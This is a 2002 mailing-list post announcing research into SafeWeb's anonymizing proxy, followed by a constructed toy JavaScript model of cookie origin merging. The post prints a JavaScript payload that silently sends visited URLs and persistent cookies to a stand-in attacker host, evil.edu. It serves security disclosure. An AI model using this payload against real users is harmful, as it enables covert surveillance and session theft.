[iwar] [fc:Deanonymizing.SafeWeb.Users]

From: Fred Cohen (fc@all.net)
Date: 2002-02-14 21:57:27



Although SafeWeb's Web anonymizing service has been shut down since
December, they claimed it was the "most widely used online privacy service
in the world".  SafeWeb licensed their technology to PrivaSec, who is
currently running the technology in a preview program for a planned
subscription service.  They also licensed it to the CIA.

Andrew Schulman and I have just finished a technical report detailing
SafeWeb's catastrophic failures under the simplest of JavaScript attacks by
Web sites or firewalls (e.g., by redirecting to a page containing the
exploit).  An example (really one long line):

self['window']['top'].frames[0]['cookie_munch'] = Function('i=new
Image(1,1);i.s'+'rc="https://evil.edu/"+top.frames[0].document.forms["fugulo
cation"].URL_text.value+(new Date()).getTime()+document.cookie;');

This is spyware.  Any Web page containing this JavaScript makes the SafeWeb
browser silently report every URL visited to the attacker at evil.edu, along
with a copy of all of the persistent cookies previously established through
SafeWeb.  It works regardless of the user's security settings (recommended
vs. paranoid mode, etc.).  This attack is the only one we describe that
depends on the browser: it works in Netscape 6.x and probably previous
versions, but not IE.  We have an attack that does basically the same thing
and works in IE too, but it's a bit longer.  Since our attacks are just
JavaScript, they probably don't depend on the OS of the victim.

Basically, using the SafeWeb privacy service helps keep user identities out
of routinely gathered log files, but it creates serious new risks for anyone
an adversary might bother to actually target.  You have to wonder whether
this is a good tradeoff.  After all, in the absence of serious bugs, Web
browsers generally prevent Web sites from silently depositing spyware or
snarfing all of the user's cookies.  One thing is clear: most users in the
intended market for this system had no idea that this system brought any
risks with it.

For the full report (23 pages, PDF):
http://www.cs.bu.edu/techreports/pdf/2002-003-deanonymizing-safeweb.pdf

We've been in touch with SafeWeb since October, and with PrivaSec for about
a month now.  Some related problems in SafeWeb involving JavaScript spilling
IP addresses have been noted here (by Alexander Yezhov) and in
alt.privacy.anon-server (by Paul Rubin).  Our paper adds spyware, cookie
snarfing, and the essential equivalence between SafeWeb's "paranoid" and
"recommended" modes of operation to the list of problems with SafeWeb's
technology.

David Martin http://www.cs.bu.edu/~dm
Andrew Schulman http://www.undoc.com/
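
Added example (not part of the original post or the report): a toy model of why a page viewed through a rewriting proxy can see cookies that a browser would normally keep separate per site. It assumes the proxy re-serves every site from a single origin; `PROXY_ORIGIN`, the `*.example` sites and all function names are constructed for illustration.

```javascript
// Toy model (constructed for illustration): the browser scopes cookies by the
// origin a page is loaded from, and a page script can read only its own scope.
class Browser {
  constructor() { this.jar = new Map(); }          // origin -> Map(name -> value)
  setCookie(origin, name, value) {
    if (!this.jar.has(origin)) this.jar.set(origin, new Map());
    this.jar.get(origin).set(name, value);
  }
  // What document.cookie would return to a script running in `origin`.
  documentCookie(origin) {
    const scope = this.jar.get(origin) || new Map();
    return [...scope].map(([k, v]) => `${k}=${v}`).join('; ');
  }
}

// Direct browsing: each site is its own origin.
function visitDirect(browser, siteOrigin, cookies = {}) {
  for (const [k, v] of Object.entries(cookies)) browser.setCookie(siteOrigin, k, v);
  return browser.documentCookie(siteOrigin);
}

// Rewriting proxy (assumed design): every page is fetched and re-served from
// PROXY_ORIGIN, so the browser files every site's cookies under that one origin.
const PROXY_ORIGIN = 'https://proxy.example';      // hypothetical proxy origin
function visitViaProxy(browser, siteOrigin, cookies = {}) {
  for (const [k, v] of Object.entries(cookies)) {
    // The proxy has to namespace cookie names itself; the browser no longer does.
    browser.setCookie(PROXY_ORIGIN, `${new URL(siteOrigin).hostname}:${k}`, v);
  }
  return browser.documentCookie(PROXY_ORIGIN);
}

// Constructed scenario: two ordinary sites set cookies, then a third page loads.
function compare() {
  const sites = [['https://bank.example', { session: 'A1' }],
                 ['https://mail.example', { uid: '42' }]];
  const direct = new Browser(), proxied = new Browser();
  for (const [o, c] of sites) { visitDirect(direct, o, c); visitViaProxy(proxied, o, c); }
  return {
    direct: visitDirect(direct, 'https://third.example'),
    proxied: visitViaProxy(proxied, 'https://third.example'),
  };
}

console.log(compare());
```

In the direct case the third page's script sees an empty cookie string; in the proxied case the only thing standing between it and the other sites' cookies is the proxy's own script rewriting.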
